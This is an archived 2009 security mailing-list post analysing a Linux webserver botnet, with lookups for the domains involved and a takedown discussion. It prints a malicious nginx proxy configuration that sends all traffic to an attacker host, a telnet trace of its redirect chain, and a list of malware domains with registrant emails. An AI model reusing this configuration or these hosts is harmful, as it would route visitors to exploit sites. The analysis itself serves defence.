[nsp-sec] Linux webserver botnet

Stephen Gill gillsr at cymru.com
Tue Sep 15 18:09:14 EDT 2009 

>   server {
>     listen 8080;
>     location / {
>       proxy_pass        http://mdvhost.com:4480;
>       proxy_redirect    off;
>       proxy_ignore_client_abort on;
>       proxy_set_header  X-Real-IP  $remote_addr;
>       proxy_set_header  Host        $host;
>       proxy_buffers     100 50k;
>       proxy_read_timeout 300;
>       proxy_send_timeout 300;
>     }
> location = /info { stub_status on; }
>   }
> 
> }
> 
> tom at dhcp-241:~$ telnet mdvhost.com 4480
> Trying 95.211.98.139...
> Connected to mdvhost.com.
> Escape character is '^]'.
> GET /ts/in.cgi?reopen HTTP/1.0
> Host:mdvhost.com
> 
> HTTP/1.1 302 Found
> Server: nginx
> Date: Tue, 15 Sep 2009 17:33:56 GMT
> Content-Type: text/html
> Connection: close
> Set-Cookie: SL_reopen_0000=_1_; domain=traffcount.cn; path=/; expires=Wed,
> 16-Sep-2009 19:43:36 GMT
> Set-Cookie: TSUSER=reopen; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/;
> domain=traffcount.cn
> Set-Cookie: SL_default_0000=_1_; domain=traffcount.cn; path=/; expires=Wed,
> 16-Sep-2009 19:43:36 GMT
> Location: http://sexfinish.ru:8080/index.php
> 
> <html>
> <head>
> <meta http-equiv="REFRESH" content="1;
> URL='http://sexfinish.ru:8080/index.php'">
> </head>
> <body>
> document moved <a href="http://sexfinish.ru:8080/index.php">here</a>
> </body>
> </html>
> Connection closed by foreign host.
> 
> Should we consider trying to get mdvhost.com and sexfinish.ru pulled from
> their TLDs or get DNS hosting shut down?

Probably, yes.

mdvhost.com

AS      | IP               | AS Name
16265   | 95.211.98.139    | LEASEWEB LEASEWEB AS
16265   | 95.211.98.142    | LEASEWEB LEASEWEB AS

sexfinish.ru 

Bulk mode; whois.cymru.com [2009-09-15 21:20:40 +0000]
16265   | 85.17.237.5      | 85.17.0.0/16        | NL | ripencc  |
2005-03-11 | LEASEWEB LEASEWEB AS
16276   | 91.121.24.139    | 91.121.0.0/17       | FR | ripencc  |
2006-09-20 | OVH OVH
16276   | 91.121.4.192     | 91.121.0.0/17       | FR | ripencc  |
2006-09-20 | OVH OVH
16276   | 91.121.97.186    | 91.121.0.0/17       | FR | ripencc  |
2006-09-20 | OVH OVH
20857   | 80.69.74.73      | 80.69.64.0/19       | NL | ripencc  |
2001-05-29 | TRANSIP-AS TransIP BV


Looks like there is also traffcount.cn in your info above which appears
related:

traffcount.cn

4812    | 222.73.37.203    | CHINANET-SH-AP China Telecom (Group)

Even more related domains:

http://www.malwareurl.com/listing.php?domain=traffcount.cn

javastat.cn    
222.73.37.203
     Trojan    
Kovalev Sergey / ea-starr at ya.ru
2009-08-14    details
tech2tech.cn    
222.73.37.203
     Exploits / Trojan FraudPack
Dzhoni Depp / sekes2 at gmail.com
2009-08-15    details
ns1.dns-lv9720.com 
222.73.37.203
     Name server for malware domains
Michell / Michell.Gregory2009 at yahoo.com
2009-08-22    details
css-csript.cn    
222.73.37.203
     Malware URLs  
IveevPlansky / ru at rupoisk.in
2009-08-22    details
marcusmed.com    
222.73.37.203
     Fraud - Scam  
Steven Lucas / steven_lucas_2000 at yahoo.com
2009-08-22    details
l2stat.cn    
222.73.37.203
     Directs to Exploits
Dyivadov Aleksandr / ea-starr at ya.ru
2009-09-03    details
traffcount.cn    
222.73.37.203
     Directs to Exploits
LucasSteven / steven_lucas_2000 at yahoo.com
2009-09-14    details
ygw4gwe.cn


-- 
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com

More information about the nsp-security mailing list